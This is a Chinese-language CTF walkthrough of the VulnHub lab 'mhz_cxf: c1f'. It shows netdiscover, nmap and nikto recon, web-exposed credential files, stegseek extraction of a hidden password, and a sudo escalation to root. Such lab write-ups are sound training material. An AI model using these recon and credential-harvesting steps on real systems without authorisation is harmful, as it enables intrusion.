Mhz_c1f
作者: jason huawen
靶机信息
名称:mhz_cxf: c1f
地址:
https://www.vulnhub.com/entry/mhz_cxf-c1f,471/
识别目标主机IP地址
sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:64:18:1b 1 60 PCS Systemtechnik GmbH 192.168.56.249 08:00:27:02:7b:29 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.249
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.249 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-04-07 02:18 EDTNmap scan report for localhost (192.168.56.249)Host is up (0.00013s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 38:d9:3f:98:15:9a:cc:3e:7a:44:8d:f9:4d:78:fe:2c (RSA)| 256 89:4e:38:77:78:a4:c3:6d:dc:39:c4:00:f8:a5:67:ed (ECDSA)|_ 256 7c:15:b9:18:fc:5c:75:aa:30:96:15:46:08:a9:83:fb (ED25519)80/tcp open http Apache httpd 2.4.29 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It works|_http-server-header: Apache/2.4.29 (Ubuntu)MAC Address: 08:00:27:02:7B:29 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
─$ curl http://192.168.56.249/robots.txt404 Not Found Not Found
The requested URL was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 192.168.56.249 Port 80
└─$ nikto -h http://192.168.56.249- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.249+ Target Hostname: 192.168.56.249+ Target Port: 80+ Start Time: 2023-04-07 02:19:53 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.29 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a40b796e2191, mtime: gzip+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD + OSVDB-3233: /icons/README: Apache default file found.+ /notes.txt: This might be interesting...+ 7915 requests: 0 error(s) and 8 item(s) reported on remote host+ End Time: 2023-04-07 02:20:17 (GMT-4) (24 seconds)---------------------------------------------------------------------------+ 1 host(s) tested ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ curl http://192.168.56.249/notes.txt 1- i should finish my second lab 2- i should delete the remb.txt file and remb2.txt
notes.txt提示可能有两个文件:remb.txt, remb2.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ curl http://192.168.56.249/remb.txt first_stage:flagitifyoucan1234 ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ curl http://192.168.56.249/remb2.txt404 Not Found Not Found
The requested URL was not found on this server.
Apache/2.4.29 (Ubuntu) Server at 192.168.56.249 Port 80
remb.txt是不是ssh用户名和密码,尝试一下:(remb2.txt文件不存在)
──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ ssh first_stage@192.168.56.249 The authenticity of host '192.168.56.249 (192.168.56.249)' can't be established.ED25519 key fingerprint is SHA256:Jxm0b2xUhxb2N50E9UVsgn5u7Pow8xX6o12kZDGlTlg.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.249' (ED25519) to the list of known hosts.first_stage@192.168.56.249's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Fri Apr 7 06:33:12 UTC 2023 System load: 0.0 Processes: 90 Usage of /: 38.2% of 9.78GB Users logged in: 0 Memory usage: 16% IP address for enp0s3: 192.168.56.249 Swap usage: 0%23 packages can be updated.0 updates are security updates.Last login: Fri Apr 24 18:18:07 2020 from 192.168.5.253$ iduid=1001(first_stage) gid=1001(first_stage) groups=1001(first_stage)$ bash -ifirst_stage@mhz_c1f:~$
first_stage@mhz_c1f:~$ cat user.txt HEEEEEY , you did it that's amazing , good job manso just keep it up and get the root bcz i hate low privileges ;)#mhz_cyber
将mhz_ctf家目录的图片下载到Kali Linux本地进行分析,其中一个图片可以破解密码从而解密内容:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ stegseek spi.jpeg StegSeek 0.6 - https://github.com/RickdeJager/StegSeek[i] Found passphrase: ""[i] Original filename: "remb2.txt".[i] Extracting to "spi.jpeg.out". ┌──(kali㉿kali)-[~/Desktop/Vulnhub/MH]└─$ cat spi.jpeg.out ooh , i know should delete this , but i cant' remember it screw me mhz_c1f:1@ec1f
first_stage@mhz_c1f:/home/mhz_c1f/Paintings$ su - mhz_c1f Password: mhz_c1f@mhz_c1f:~$ iduid=1000(mhz_c1f) gid=1000(mhz_c1f) groups=1000(mhz_c1f),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)mhz_c1f@mhz_c1f:~$ sudo -l[sudo] password for mhz_c1f: Matching Defaults entries for mhz_c1f on mhz_c1f: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser mhz_c1f may run the following commands on mhz_c1f: (ALL : ALL) ALLmhz_c1f@mhz_c1f:~$ sudo /bin/bashroot@mhz_c1f:~# cd /rootroot@mhz_c1f:/root# ls -alhtotal 32Kdrwx------ 3 root root 4.0K Apr 24 2020 .drwxr-xr-x 24 root root 4.0K Apr 13 2020 ..-rw------- 1 root root 54 Apr 24 2020 .bash_history-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc-rw-r--r-- 1 root root 148 Aug 17 2015 .profile-rw-r--r-- 1 root root 124 Apr 24 2020 .root.txtdrwx------ 2 root root 4.0K Apr 13 2020 .ssh-rw------- 1 root root 833 Apr 24 2020 .viminforoot@mhz_c1f:/root# cat .root.txtOwO HACKER MAN :DWell done sir , you have successfully got the root flag.I hope you enjoyed in this mission.#mhz_cyberroot@mhz_c1f:/root#
至此得到了root shell以及root flag
经验教训
- 在得到shell后提权时方向是对的,因为检查其他的提权漏洞都没有发现,可疑的就是mhz_ctf用户目录下的几个图片文件,但是在检查了2个图片后就中止,以为方向问题,其实答案就在第4个图片文件中,所以需要坚持的精神
STRIVE FOR PROGRESS,NOT FOR PERFECTION